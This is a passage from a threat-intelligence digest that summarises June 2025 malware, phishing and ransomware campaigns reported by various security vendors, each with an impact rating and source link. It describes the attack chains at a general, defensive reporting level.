Summary:: Researchers at CyberArmor have identified a phishing campaign, active for at least the past two months, where threat actors are abusing the legitimate Vercel hosting platform to deliver a malicious version of the LogMeIn remote access tool. Attackers use phishing emails with lures related to invoices and deliveries to direct victims to Vercel-hosted websites that impersonate an Adobe PDF viewer. Social engineering convinces the user to download and run an executable file, which installs the remote access tool and grants the attacker full control over the compromised machine. This abuse of trusted services like Vercel and LogMeIn is a deliberate tactic to bypass security controls and lower user suspicion, making detection difficult.

Source: https://cyberarmor.tech/threat-insight-cybercriminals-abusing-vercel-to-deliver-remote-access-malware/

Intel Source:: Hunt.IO

Intel Name:: PowerShell_Loaders_Deploy_Cobalt_Strike

Date of Scan:: 2025-06-22

Impact:: MEDIUM

Summary:: Researchers at Hunt.io have identified a threat campaign leveraging PowerShell loaders to deliver Cobalt Strike beacons, utilizing infrastructure across China, Russia, and other global cloud platforms. Discovered in late May and early June 2025, the attack begins with a PowerShell script retrieved from an open directory on a Chinese server. This script executes shellcode in-memory, employing API hashing and reflective DLL injection to evade detection. The initial payload connects to a second-stage server on Baidu's cloud platform to retrieve the final Cobalt Strike beacon, which then communicates with a command-and-control server in Russia.

Source: https://hunt.io/blog/cobaltstrike-powershell-loader-chinese-russian-infrastructure

Intel Source:: Cofense

Intel Name:: TxTag_Toll_Phishing_Campaign

Date of Scan:: 2025-06-21

Impact:: LOW

Summary:: Cofense researchers have discovered phishing campaign impersonating TxTag, a legitimate toll collection service in Texas. The attackers send phishing emails that spoof a legitimate Indiana state government email address, leveraging a legitimate domain to deceive recipients. The email warns recipients about unpaid toll fees and threatens penalties or vehicle registration holds to induce urgency. If recipients click the embedded link, they are redirected to a deceptive website disguised as the official TxTag site, hosted on a fake domain (txtag-help[.]xyz) where victims are asked to enter personal information, credit card details, and additional payment data if the fake payment form claims the initial attempt failed.

Source: https://cofense.com/blog/txtag-takedown-busting-phishing-email-schemes

Intel Source:: Securonix Threat Lab

Intel Name:: SERPENTINE_CLOUD_Campaign

Date of Scan:: 2025-06-20

Impact:: MEDIUM

Summary:: Researchers at Securonix have uncovered an ongoing campaign named SERPENTINE#CLOUD leveraging Cloudflare Tunnel to secretly deliver Python-based malware. The attack starts with phishing emails containing ZIP archives that include malicious .LNK shortcut files disguised as invoice-themed PDFs. When clicked, these shorts execute hidden scripts that connect to attacker-controlled Cloudflare domains using WebDAV to download additional malicious files. The infection chain proceed through VBScript and batch files, eventually leading to Python-based loaders that execute malware directly in memory using Donut shellcode. The malware employs advanced obfuscation techniques, including character encoding, base64 and Python binary packer called Kramer. The final payload includes RATs like AsyncRAT or RevengeRAT which give attackers full control over compromised machines. The campaign has been observed targeting victims in the U.S., U.K., Germany and other Western countries.

Source: https://www.securonix.com/blog/analyzing_serpentinecloud-threat-actors-abuse-cloudflare-tunnels-threat-research/

Intel Source:: Elastic Security Labs

Intel Name:: CAPTCHA_Campaigns_Deliver_Malware

Date of Scan:: 2025-06-20

Impact:: LOW

Summary:: Elastic researchers have identified a surge in ClickFix-based social engineering campaigns throughout 2025. These campaigns leverage deceptive CAPTCHA verification pages to trick users into executing malicious PowerShell commands. These campaigns initiate a multi-stage infection chain that delivers a RAT and infostealer called ARECHCLIENT2 also known as SectopRAT. The infection begins when a user interacts with the fake CAPTCHA page, leading to the execution of GHOSTPULSE loader. It employs DLL sideloading to evade detection and delivers encrypted payload. GHOSTPULSE runs a .NET-based loader that disables Windows security checks, decrypts embedded malware and loads ARECHCLIENT2 directly into the system memory. It targets credentials, cryptocurrency wallets, browser data and system reconnaissance while establishing persistent remote access.

Source: https://www.elastic.co/security-labs/a-wretch-client

Intel Source:: Halcyon

Intel Name:: AsyncRAT_Campaign

Date of Scan:: 2025-06-20

Impact:: MEDIUM

Summary:: Researchers at Halcyon have identified a financially motivated cybercriminal group conducting a widespread phishing campaign leveraging commodity RATs such as AsyncRAT, XWorm and Remcos. The campaign has been active since early 2024 and targets organizations globally across all sectors. The attack starts with phishing emails linking to Dropbox-hosted ZIP files that initiate a multi-stage infection process involving .URL and .LNK files, obfuscated batch scripts, and Python-based loaders. The attackers use temporary TryCloudflare tunnels to deliver the final malware payloads. These tunnels allow them to bypass traditional network defenses by exploiting legitimate services to hide their activity. The malware uses Python scripts to run from memory and uncommon system folders to evade both EPP and EDR solutions. The threat actors appear to function as initial access brokers, potentially selling access or deploying ransomware.

Source: https://www.halcyon.ai/blog/asyncrat-campaign-continues-to-evade-endpoint-detection

Intel Source:: The Raven File

Intel Name:: BERT_Ransomware_Targets_Windows_and_Linux

Date of Scan:: 2025-06-19

Impact:: MEDIUM

Summary:: Researchers at The Raven File have identified a new ransomware operation, known as BERT, which has been active since at least mid-March 2025. The group, which employs double extortion tactics, initially targeted Windows systems but expanded its capabilities in May 2025 to include a Linux variant that shares an 80% codebase match with the notorious Revil ransomware. Gaining initial access via phishing, the attackers deploy a multi-stage attack chain beginning with a PowerShell script that disables system defenses, including Windows Defender, the firewall, and UAC. Once security controls are neutralized, the ransomware payload is downloaded from Russian-controlled infrastructure and executed. Victims are geographically diverse, with a focus on the Service and Manufacturing sectors in the US, UK, and Asia.

Source: https://theravenfile.com/2025/06/16/bert-ransomware/

Intel Source:: Polyswarm

Intel Name:: Chaos_RAT_Targets_Windows_and_Linux

Date of Scan:: 2025-06-19

Impact:: LOW

Summary:: Researchers from Acronis have uncovered new variants of the Chaos RAT, which has evolved from an open-source project into a versatile, cross-platform malware threat. Active campaigns since June 2025 target both Windows and Linux systems via phishing emails containing malicious PDF files. These documents lure users into clicking embedded links, initiating a multi-stage infection chain that deploys the final RAT payload. The malware's objectives are financial gain through the deployment of cryptominers and data theft, leveraging capabilities including keylogging, screen capture, file exfiltration, and full remote command execution. Chaos RAT employs complex obfuscation and anti-analysis techniques, such as checking for virtualized environments, to evade detection and hinder reverse engineering. Its ability to compromise both major operating systems with a full suite of intrusive tools creates a significant risk of data breaches and system degradation for a broad range of organizations.

Source: https://blog.polyswarm.io/new-chaos-rat-variants-observed

Intel Source:: Cybereason

Intel Name:: Qilin_RaaS_Fills_Ransomware_Power_Vacuum

Date of Scan:: 2025-06-18

Impact:: MEDIUM

Summary:: Researchers from Cybereason have observed the Qilin ransomware-as-a-service (RaaS) operation emerging to fill a power vacuum created by the collapse of other major ransomware groups in early 2025. Qilin has been active since late 2022 but is rapidly gaining dominance by offering a sophisticated, full-service cybercrime platform to its affiliates. The operation uses cross-platform malware written in Rust for Windows and C for Linux to target a wide range of systems, with a specific focus on enterprise virtualization environments like VMware ESXi and Nutanix. Attackers gain initial access, then use tools like PsExec for lateral movement, abuse PowerShell for privilege escalation, and execute scripts to disable hypervisor functions, terminate virtual machines, and delete backups before encrypting data.

Source: https://www.cybereason.com/blog/threat-alert-qilin-seizes-control

Intel Source:: ASEC

Intel Name:: MySQL_RAT_Campaign

Date of Scan:: 2025-06-18

Impact:: LOW

Summary:: Researchers at ASEC have uncovered an ongoing campaign targeting improperly secured MySQL servers, primarily those operating in Windows system. The attackers exploit exposed port 3306/TCP using brute-force and dictionary attacks to gain administrative access. Once compromised, they install various types of malwares, including GhostRAT, XWorm, HpLoader, and User Defined Function (UDF) based files. The use of UDF DLLs allows attackers to execute commands, download files, and load malware directly into memory. GhostRAT variants like GhostCringe and HiddenGh0st, are capable of privilege escalation and screen capture while Xworm, a modified remote access tool, can steal credentials, spread through USB devices and capture clipboard data. The attackers have also used legitimate tools like Zoho ManageEngine agents to maintain access without using traditional backdoors.

Source: https://asec.ahnlab.com/ko/88468/

Intel Source:: ASEC

Intel Name:: Kimsuky_Targets_Academics_via_Phishing_Campaign

Date of Scan:: 2025-06-17

Impact:: MEDIUM

Summary:: ASEC researchers have uncovered a new phishing campaign by North Korean state-sponsored group called Kimsuky targeting professionals by impersonating thesis reviewers. They send phishing emails containing malicious password-protected Hangul Word Processor (HWP) documents. When the victim opens the file and enables content, it drops multiple files into the system’s temporary directory, including a BAT script that initiates a multi-stage infection process. This process installs a PowerShell script that collects system and antivirus data, exfiltrates the data to a Dropbox account controlled by the attackers and downloads additional payloads. The malware also abuses the legitimate remote access software AnyDesk by altering its configuration files with attacker-controlled versions, effectively all visual signs like tray icons and windows are hidden. Additionally, the attackers leverage scheduled task abuse, encoded payloads, and a step-by-step method to stay hidden and maintain access.

Source: https://asec.ahnlab.com/ko/88419/

Intel Source:: ISC.SANS

Intel Name:: Go_Based_SSH_Botnet_Targets_Linux_Systems

Date of Scan:: 2025-06-17

Impact:: LOW

Summary:: Researchers at ISC.SANS have identified a global, automated attack campaign targeting internet-exposed Linux systems with weak SSH credentials. The threat actor, utilizing a Go-based tool, brute-forces access and executes a multi-stage infection to establish persistent control. Observed on April 29, 2025, the attack involves deploying architecture-specific malware variants for ARM and x86 systems, indicating a clear focus on compromising a wide range of devices, including the Internet of Things (IoT) ecosystem. After gaining initial access, the attacker installs an SSH key backdoor and uses the chattr command to make the authorized_keys file immutable, significantly hindering remediation efforts.

Source: https://isc.sans.edu/diary/rss/32024

Intel Source:: cloudsek

Intel Name:: Fileless_AsyncRAT_via_Clickfix_Lure

Date of Scan:: 2025-06-16

Impact:: LOW

Summary:: Researchers at CloudSEK have identified an active fileless malware campaign distributing AsyncRAT to German-speaking users. The attack, ongoing since at least April 2025, begins with a Clickfix-themed website that socially engineers victims into executing a malicious PowerShell command through a fake CAPTCHA prompt. The initial command downloads a second-stage, obfuscated PowerShell script, which then decodes and reflectively loads a C# AsyncRAT payload directly into memory, evading file-based detection. The malware leverages legitimate system utilities like conhost.exe and PowerShell for stealthy execution, establishes persistence via RunOnce registry keys, and communicates with a command-and-control server over TCP port 4444.

Source: https://www.cloudsek.com/blog/fileless-asyncrat-distributed-via-clickfix-technique-targeting-german-speaking-users

Intel Source:: Darktrace

Intel Name:: ClickFix_Social_Engineering_Attack_Chain

Date of Scan:: 2025-06-16

Impact:: LOW

Summary:: Researchers from Darktrace have observed threat actors, including APT groups like APT28 and MuddyWater, leveraging a social engineering tactic dubbed "ClickFix" to gain initial access and exfiltrate data from organizations. This prolific campaign, observed in early 2025 across EMEA and the United States, targets the human user as the weakest link through phishing or malvertising that directs victims to a fake prompt, such as a CAPTCHA or error message. These prompts trick users into manually executing a malicious PowerShell command, which establishes command and control (C2) communication. This allows attackers to download secondary payloads like XWorm or Lumma, move laterally, and exfiltrate sensitive system information.

Source: https://www.darktrace.com/blog/unpacking-clickfix-darktraces-detection-of-a-prolific-social-engineering-tactic

Intel Source:: Picussecurity

Intel Name:: Katz_Stealer

Date of Scan:: 2025-06-16

Impact:: LOW

Summary:: Researchers from Picus have uncovered new information-stealing malware-as-a-service (MaaS) that emerged in 2025. The malware is distributed via phishing campaigns and trojanized software. It leverages multi-stage infection chain that includes obfuscated JavaScript droppers, PowerShell loaders and .NET-based UAC bypass techniques. The malware runs entirely in memory, hides inside legitimate Windows processes and uses images to secretly run malicious code. Once inside the system, it targets web browsers like Chrome and Firefox, email accounts, VPN services, file transfer programs and cryptocurrency wallets. Additionally, It takes control of Discord by injecting malicious code that runs every time the app starts, giving attackers remote access to the system.

Source: https://www.picussecurity.com/resource/blog/understanding-katz-stealer-malware-and-its-credential-theft-capabilities

Intel Source:: K7 Labs

Intel Name:: Spectra_Ransomware_Double_Extortion

Date of Scan:: 2025-06-16

Impact:: MEDIUM

Summary:: Researchers from K7 Security Labs have observed Spectra Ransomware, an emerging double-extortion threat targeting Windows-based systems. Attackers demand a $5,000 Bitcoin payment within a 72-hour deadline, threatening to leak stolen data if victims do not comply. The malware achieves persistence by creating a Run registry key and masquerading as svchost.exe in the AppData folder.

Source: https://labs.k7computing.com/index.php/the-spectre-of-spectraransomware/

Intel Source:: Resecurity

Intel Name:: APT41_Uses_Google_Calendar_for_C2

Date of Scan:: 2025-06-16

Impact:: MEDIUM

Summary:: Researchers from Resecurity have uncovered that the Chinese state-sponsored threat actor called APT 41 which is involved in both espionage and cybercrime, has launched a new campaign leveraging Google Calendar as a covert C2 channel. The threat actor gains initial access through spear phishing emails containing a ZIP archive disguised as export documentation which includes malicious LNK files and decoy images. Upon execution, a series of malware components - PLUSDROP, PLUSINJECT, and TOUGHPROGRESS activate and run directly in the system’s memory, using process hollowing, and hiding inside legitimate system processes to avoid detection. The final payload TOUGHPROGRESS, communicates with attacker-controlled Google Calendar events to receive commands and sends stolen data back by writing it into new calendar entries. This malware is highly advanced and capable of altering the Windows operating system, which could allow the attackers to take full control of the system and erase traces of their activity.

Source: https://www.resecurity.com/blog/article/apt-41-threat-intelligence-report-and-malware-analysis

Intel Source:: Trend Micro

Intel Name:: Anubis_RaaS_Group

Date of Scan:: 2025-06-16

Impact:: MEDIUM

Summary:: Trend Micro researchers have discovered new ransomware strain called Anubis which operates as a ransomware-as-a-service (RaaS) operation active since December 2024. It includes a file-wiping feature alongside traditional encryption, creating a dual-threat approach that puts extra pressure on victims to pay the ransom. Anubis affiliates gain access through spear-phishing campaigns and leverage advanced techniques such as privilege escalation, access token manipulation and shadow copy deletion to prevent recovery. Anubis has targeted organizations in various sectors, especially healthcare and construction with confirmed attacks in countries including Australia, Canada, Peru and the U.S. The group operates on cybercrime forums such as RAMP and XSS, offering flexible affiliate programs to other cybercriminal groups.

Source: https://www.trendmicro.com/en_us/research/25/f/anubis-a-closer-look-at-an-emerging-ransomware.html

Intel Source:: Spider Labs

Intel Name:: Mamba2FA_Credential_Harvesting_Campaign

Date of Scan:: 2025-06-16

Impact:: LOW

Summary:: Researchers at SpiderLabs have identified an active phishing campaign leveraging a Phishing-as-a-Service (PhaaS) kit known as Mamba2FA. The attack begins with a lure themed as a "Secure Document Portal," designed to trick victims into entering their email address to access a purported document. Upon submission, the user is redirected to a counterfeit Microsoft login page for credential harvesting. The use of a PhishKit and PhaaS infrastructure indicates a commoditized and scalable threat, enabling less-skilled actors to deploy effective attacks.

Source: https://x.com/SpiderLabs/status/1932844577355939890

Intel Source:: Trend Micro

Intel Name:: Water_Curse_GitHub_Malware_Campaign

Date of Scan:: 2025-06-16

Impact:: MEDIUM

Summary:: Researchers from Trend Micro have uncovered a broad supply chain campaign conducted by a financially motivated threat actor tracked as Water Curse, targeting developers, security professionals, and gamers. The actor leverages at least 76 weaponized GitHub repositories to deliver multistage malware. The initial attack vector involves tricking users into downloading and compiling seemingly legitimate open-source tools, where malicious code embedded in Visual Studio project files executes during the build process. This initiates a complex infection chain using VBS and PowerShell scripts to deploy an Electron-based backdoor, which performs privilege escalation through UAC bypass, establishes persistence via scheduled tasks, and disables security defenses like Windows Defender and Volume Shadow Copies.

Source: https://www.trendmicro.com/en_us/research/25/f/water-curse.html

Intel Source:: Securelist

Intel Name:: Mirai_Variant_Exploits_DVRs_via_CVE_2024_3721

Date of Scan:: 2025-06-16

Impact:: LOW

Summary:: Researchers from Securelist have observed a new Mirai botnet variant actively exploiting a remote code execution vulnerability (CVE-2024-3721) in internet-exposed TBK DVR devices. The campaign uses a crafted POST request to download and execute a malicious ARM32 binary, immediately compromising the device without reconnaissance. The malware is a Mirai variant enhanced with anti-evasion features, including RC4-encrypted strings and checks to detect virtualization and emulation environments.

Source: https://securelist.com/mirai-botnet-variant-targets-dvr-devices-with-cve-2024-3721/116742/

Intel Source:: IBM X-Force

Intel Name:: Hive0131_Targets_Latin_America

Date of Scan:: 2025-06-16

Impact:: MEDIUM

Summary:: Researchers at IBM X-Force have identified a surge in cyber-attacks involving DCRat across Latin America. These attacks are attributed to the financially motivated threat group Hive0131. The group send phishing emails impersonating Colombian judicial entities to tricks recipient into clicking on malicious links embedding in PDFs and Google Docs to initiate infection chains. These phishing campaigns deliver DCRat, a Malware-as-a-Service (MaaS) tool via obfuscated loaders such as VMDetectLoader which employs virtual machine detection, AMSI bypass and process hollowing to evade detection. The malware is capable of surveillance, data exfiltration, command execution and persistence through scheduled tasks or registry keys. Researchers also observed that the attackers use various methods such as JavaScript and VBScript to distribute the malware. Hive0131 appears to be shifted from traditional RATs like QuasarRAT and NjRAT to more advanced payloads like DCRat which make detection and removal more difficult.

Source: https://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america

Intel Source:: CERT-AGID

Intel Name:: Italian_Remcos_Malware_Campaign

Date of Scan:: 2025-06-12

Impact:: MEDIUM

Summary:: Researchers at cert agid have identified a malware campaign targeting Italy, active around June 10-11, 2025. Threat actors are distributing the Remcos Remote Access Trojan (RAT) via email, using malicious ZIP file attachments. The campaign leverages a financial lure with an email subject of "AV: Avviso di pagamento" (Payment notice) to trick recipients into executing the payload. The use of the "ModiLoader" tag suggests a potential multi-stage infection chain. The primary motivation appears to be financial, using the RAT's capabilities for credential theft, data exfiltration, and full remote control of compromised systems.

Source: https://cert-agid.gov.it/wp-content/uploads/2025/06/remcos-11-06-2025.json

Intel Source:: ASEC

Intel Name:: Arkana_Ransomware_Exfiltrates_Brokerage_Data

Date of Scan:: 2025-06-12

Impact:: MEDIUM

Summary:: Researchers from ASEC have observed the Arkana ransomware group claiming responsibility for a significant data breach targeting in a UK-based global online brokerage firm. The group exfiltrated approximately 50 GB of data, including sensitive Know Your Customer (KYC) records and customer information, and threatened to leak or sell the dataset if a ransom was not paid by June 10, 2025. This double-extortion attack, publicized on the group's dedicated leak site, was focused on monetizing the stolen information. The incident highlights a severe threat to the financial sector, where exfiltrated KYC data presents a high risk of identity theft and fraud.

Source: https://asec.ahnlab.com/en/88437/

Intel Source:: Qi'anxin Threat Intelligence Center

Intel Name:: DCRat_Targeting_Blockchain_Users

Date of Scan:: 2025-06-12

Impact:: LOW

Summary:: Qi'anxin Threat Intelligence Center and the Skyrocket Falcon team have identified a financially motivated campaign targeting blockchain and cryptocurrency users. Unknown attackers deliver a malicious ZIP archive containing a shortcut file (LNK) via the Telegram messaging application. Execution of the lure file initiates a multi-stage infection process that uses VBScript and PowerShell to download components from cloud storage. The attack leverages DLL side-loading, using legitimately signed executables to load a malicious DLL, which then loads and injects the DCRat remote access trojan (RAT) into memory. This methodology is designed to evade detection by traditional security tools. The attackers' infrastructure also hosts fraudulent cryptocurrency investment websites, indicating the primary objective is theft.

Source: https://ti.qianxin.com/blog/articles/counterfeiting-qianxin-certificates-targeted-attacks-against-blockchain-customers-en/

Intel Source:: somedieyoungZZ

Intel Name:: Winos_4_0_Behind_Operation_Holding_Hands

Date of Scan:: 2025-06-12

Impact:: MEDIUM

Summary:: Researcher somedieyoungZZ have detailed the 'Operation Holding Hands' campaign, a multi-stage attack attributed to the China-linked Silver Fox APT group. Targeting users in Japan and Taiwan, the campaign begins with a phishing lure—a digitally signed executable masquerading as a salary revision notice. This initial payload leverages its stolen certificate to appear legitimate while it drops and unpacks subsequent stages using COM objects. The malware employs sophisticated evasion techniques, including DLL search order hijacking and dynamic API resolution via configuration files, to minimize its forensic footprint. The final payload is a memory-resident backdoor, identified as Winos 4.0, which connects to hardcoded C2 infrastructure for persistent access and espionage.

Source: https://somedieyoungzz.github.io/posts/silver-fox/

Intel Source:: Symantec

Intel Name:: Fog_Ransomware_Employs_Unusual_Toolset

Date of Scan:: 2025-06-12

Impact:: MEDIUM

Summary:: Symantec researchers have reported attack against a financial institution in Asia involving the Fog ransomware. The operators demonstrated an unusual methodology, blending ransomware deployment with espionage-style tactics. After an approximate two-week dwell time, the attackers deployed a unique toolset including the legitimate employee monitoring software Syteca for spying, and open-source C2 frameworks like GC2 and Adaptix for command and control. Notably, the threat actors established persistence via a new service after deploying the ransomware, a clear deviation from typical smash-and-grab ransomware behavior. This post-encryption activity suggests a dual motive: the ransomware may have been a decoy for a more persistent espionage operation, or an opportunistic monetization of an existing intrusion.

Source: https://www.security.com/threat-intelligence/fog-ransomware-attack

Intel Source:: ISC.SANS

Intel Name:: Quasar_RAT_via_Obfuscated_Batch_Files

Date of Scan:: 2025-06-12

Impact:: LOW

Summary:: Researchers at ISC.SANS have identified an active campaign delivering the Quasar Remote Access Trojan (RAT) through a multi-stage infection process. Threat actors initiate the attack with a simple batch script that opens a decoy document to deceive the user while concurrently using PowerShell to download and execute a second, heavily obfuscated batch file.

Source: https://isc.sans.edu/diary/rss/32036

Intel Source:: Securelist

Intel Name:: BrowserVenom_Spreads_Via_Fake_AI_Download_Ads

Date of Scan:: 2025-06-12

Impact:: LOW

Summary:: Researchers from Securelist have identified a new malware campaign leveraging the DeepSeek-R1 LLM to distribute an implant dubbed BrowserVenom. The threat actors are believed to be Russian speaking based on code comments, use malicious online ads to lure people searching for DeepSeek r1 are redirected to a fake site that delivers a trojanized installer named AI_Launcher_1.21.exe. When executed, the file starts a multi-stage infection process involving fake CAPTCHA screens, PowerShell-based defense evasion, and downloads and installs the final payload called BrowserVenom which installs a malicious certificate and silently changes the settings of all major web browsers. The campaign has been observed in Brazil, Cuba, Mexico, India, Nepal, South Africa and Egypt, showing a wide geographical distribution.

Source: https://securelist.com/browservenom-mimicks-deepseek-to-use-malicious-proxy/115728/

Intel Source:: 360 Threat Intelligence Center

Intel Name:: Transparent_Tribe_DISGOMOJI_Targeting_Linux

Date of Scan:: 2025-06-11

Impact:: MEDIUM

Summary:: The 360 Threat Intelligence Centre have revealed a new espionage campaign by the South Asian threat actor APT-C-56, also known as Transparent Tribe. The group is targeting Indian government and military personnel with a complex, multi-stage DISGOMOJI malware variant designed for Linux systems. Initial access is gained through social engineering, tricking users into running a Golang ELF loader disguised as a password utility for a lure PDF document. The highly resilient attack chain leverages Google Drive for payload delivery and Google Cloud Platform for command-and-control, bypassing traditional network defenses. Once established, the final payload steals system information, exfiltrates documents, harvests Firefox browser credentials, and deploys the MeshAgent remote access tool for long-term persistence.

Source: https://www.ctfiot.com/253976.html

Intel Source:: Cyfirma

Intel Name:: CYBEREYE_RAT

Date of Scan:: 2025-06-11

Impact:: LOW

Summary:: Cyfirma researchers have identified a new .NET-based malware called CyberEye also known as TelegramRAT which is actively distributed through GitHub repository and Telegram channels operated by threat actors using the aliases @cisamu123 and @CodQu. The malware is deployed through a GUI-based builder that enables low-skill cybercriminals to generate customized payloads with features such as keylogging, credential theft, clipboard hijacking and persistence mechanisms. CyberEye uses Telegram to communicate with attackers, so they don’t need to set up their own servers. It turns off Windows Defender using system settings and PowerShell commands and attempts to gain higher system privileges. It steals saved passwords from browsers, session data from apps like Telegram, Discord, and Steam and sends sensitive files and screenshots back to the attacker.

Source: https://www.cyfirma.com/research/understanding-cybereye-rat-builder-capabilities-and-implications/

Intel Source:: DTI

Intel Name:: FIN6_Delivers_More_Eggs_Malware

Date of Scan:: 2025-06-11

Impact:: MEDIUM

Summary:: DTI researchers have uncovered a phishing campaign conducted by financially motivated group called Skeleton Spider also tracked as FIN6 leveraging deceptive job application lures to distribute More_Eggs malware. The group initiates contact with recruiters on professional job platforms like LinkedIn and Indeed, impersonating job seekers. They send phishing messages containing links to fake resume websites that appear legitimate but are actually controlled by the attackers. These fraudulent sites are registered anonymously and hosted on trusted cloud services like AWS. The attackers employ techniques such as CAPTCHA challenges, filtering based on IP address, and behavioral checks to selectively deliver malicious ZIP files. The payload chain includes a disguised .LNK file that executes JavaScript via wscript.exe, enabling credential theft, command execution, and potentially install such as ransomware. FIN6 abuses cloud services like Amazon CloudFront and S3 to obscure the origin of the attack and evade detection.

Source: https://dti.domaintools.com/Skeleton-Spider-Trusted-Cloud-Malware-Delivery/

Intel Source:: CyberProof

Intel Name:: SharePoint_Phishing_Exploits_Trusted_Links

Date of Scan:: 2025-06-10

Impact:: MEDIUM

Summary:: CyberProof researchers have observed a significant surge in phishing campaigns that abuse legitimate Microsoft SharePoint links to evade detection and harvest credentials. Attackers leverage the inherent trust users and security tools place in SharePoint URLs to deliver multi-stage credential harvesting pages. These attacks are increasingly sophisticated, often requiring the specific victim's email address and a legitimate Microsoft-sent one-time code to proceed, foiling automated analysis. Following a successful compromise, threat actors have been observed adding their own multi-factor authentication (MFA) methods and creating malicious inbox rules to maintain persistence and further infiltrate the organization.

Source: https://www.cyberproof.com/blog/deceptive-links-unmasking-sharepoint-phishing-attacks/

Intel Source:: Zscaler

Intel Name:: DanaBot_C2_Memory_Leak_DanaBleed

Date of Scan:: 2025-06-10

Impact:: MEDIUM

Summary:: Zscaler researchers have discovered a critical memory leak vulnerability, dubbed "DanaBleed," within the command-and-control (C2) infrastructure of the DanaBot Malware-as-a-Service (MaaS) platform. Introduced in a June 2022 software update, a programming error in the Delphi-based C2 server caused it to append uninitialized memory to network responses, leaking sensitive data until early 2025. This flaw, comparable to the 2014 Heartbleed bug, exposed the group's internal operations, including threat actor credentials, backend infrastructure IPs and onion domains, private cryptographic keys, and exfiltrated victim information.

Source: https://www.zscaler.com/blogs/security-research/danableed-danabot-c2-server-memory-leak-bug

Intel Source:: K7 Labs

Intel Name:: SoraAI_Clickbait_InfoStealer

Date of Scan:: 2025-06-10

Impact:: LOW

Summary:: According to analysis by K7 Labs, an information stealer is being distributed using social engineering tactics that leverage interest in generative AI tools. The campaign, first observed in late May 2025, begins when a user executes a malicious shortcut file (.lnk) masquerading as OpenAI's Sora. This initiates a multi-stage download process using PowerShell to fetch payloads from a public GitHub repository. The final payload is a comprehensive Python-based stealer that establishes persistence and proceeds to harvest a wide array of sensitive data, including browser credentials, cookies, credit card details, cryptocurrency wallets, gaming platform session data, and sensitive files from the victim's machine.

Source: https://labs.k7computing.com/index.php/a-soraai-clickbait/

Intel Source:: Socket

Intel Name:: RubyGems_Exploit_Telegram_Ban_for_Data_Theft

Date of Scan:: 2025-06-10

Impact:: LOW

Summary:: Researchers at Socket have identified an ongoing supply chain attack targeting the RubyGems ecosystem, where a threat actor, using Vietnamese-formatted aliases, published malicious gems named fastlane-plugin-telegram-proxy and fastlane-plugin-proxy_teleram around May 24 and May 30, 2025. These gems typosquat legitimate Fastlane plugins and were released shortly after Vietnam's nationwide Telegram ban, exploiting the increased demand for proxy solutions. The malware operates by redirecting Telegram API calls through an attacker-controlled C2 server, silently exfiltrating bot tokens, chat IDs, messages, and files from developers, particularly those using CI/CD pipelines.

Source: https://socket.dev/blog/malicious-ruby-gems-exfiltrate-telegram-tokens-and-messages-following-vietnam-ban

Intel Source:: Esentire

Intel Name:: Threat_Actor_Pivot_to_New_Evasion_Tools

Date of Scan:: 2025-06-09

Impact:: LOW

Summary:: Researchers from eSentire have observed threat actors demonstrating significant operational resilience following the recent law enforcement takedown of a prominent malware scanning service during "Operation Endgame." The dismantled platform was a key tool for cybercriminals, allowing them to test malware evasion capabilities against security products without the risk of their samples being shared with vendors. eSentire's analysis shows threat actors have quickly migrated to alternative "no distribute" scanning services to continue refining their malicious payloads. This behavior is part of a systematic process where actors use crypters to pack malware and then iteratively test it until detection rates are acceptably low, enabling more effective campaigns.

Source: https://www.esentire.com/blog/operation-endgame-disrupts-avcheck-forces-threat-actors-to-seek-alternatives

Intel Source:: ESET

Intel Name:: BladedFeline_Target_Kurdish_and_Iraqi_Officials

Date of Scan:: 2025-06-09

Impact:: MEDIUM

Summary:: ESET researchers have discovered an Iran-aligned APT group called BladedFeline which is believed to be a subgroup of OilRig APT. The group has been active since at least 2017 and targets high-ranking officials within the Kurdistan Regional Government (KRG), the Government of Iraq (GOI), and a telecom provider in Uzbekistan. This group leverages custom malware such as Shahmaran, Whisper, Slippery Snakelet, the PrimeCache IIS module and reverse tunneling tools like Laret and Pinar. These tools are designed to maintain long-term access to compromised systems, steal sensitive data and execute remote commands. It is believed that the group gains initial access by exploiting internet-facing applications and using stolen email accounts. The group’s primary objective is long-term intelligence gathering to monitor political developments in the region and reduce Western influence.

Source: https://www.welivesecurity.com/en/eset-research/bladedfeline-whispering-dark/

Intel Source:: Fortinet

Intel Name:: FormBook_Delivers_through_Malicious_Excel_File

Date of Scan:: 2025-06-09

Impact:: LOW

Summary:: Researchers from FortiGuard have identified an ongoing phishing campaign leveraging Microsoft Office vulnerability CVE-2017-0199 to install the FormBook information-stealing malware. The campaign targets Microsoft Windows users who still uses outdated Office versions (2007–2016) through emails masquerading as sales orders with malicious Excel attachments. Once opened, the embedded OLE object exploits the CVE-2017-0199 vulnerability to retrieve and execute a remote HTA script via mshta.exe. This script downloads and executes a secondary payload into directory to ultimately deploy the FormBook malware. The malware is capable of harvesting credentials, keystrokes and clipboard data. The attackers employ anti-debugging techniques and obfuscation to evade detection

Source: https://www.fortinet.com/blog/threat-research/how-a-malicious-excel-file-cve-2017-0199-delivers-the-formbook-payload

Intel Source:: Seqrite

Intel Name:: Operation_DRAGONCLONE

Date of Scan:: 2025-06-09

Impact:: MEDIUM

Summary:: Researchers from Seqrite Labs have uncovered a sophisticated cyberattack targeting China Mobile Tietong Co., Ltd., a subsidiary of China Mobile, leveraging a multi-stage malware delivery chain involving VELETRIX and VShell. The attack began in May 2025 and used a deceptive internal training ZIP file to trick users into opening it. The ZIP file contained legitimate signed binaries and a hidden malicious file that exploited DLL sideloading to deploy VELETRIX. The malware employs advanced techniques to avoid detection including tricks to bypass sandbox analysis, IP obfuscation and executing malicious code in memory. Its primary objective is to load VShell, a framework that used to control compromised machines. VShell communicates via standard Windows networking features and is known to be used by Chinese state-sponsored groups like UNC5174 and Earth Lamia. Additionally, researchers identified connections between this campaign and other known tools like Cobalt Strike and SuperShell with command servers based in China, Hong Kong, and the US.

Source: https://www.seqrite.com/blog/operation-dragonclone-chinese-telecom-veletrix-vshell-malware/

Intel Source:: Cisco Talos

Intel Name:: PathWiper_Targets_Ukrainian_Critical_Infrastructure

Date of Scan:: 2025-06-08

Impact:: LOW

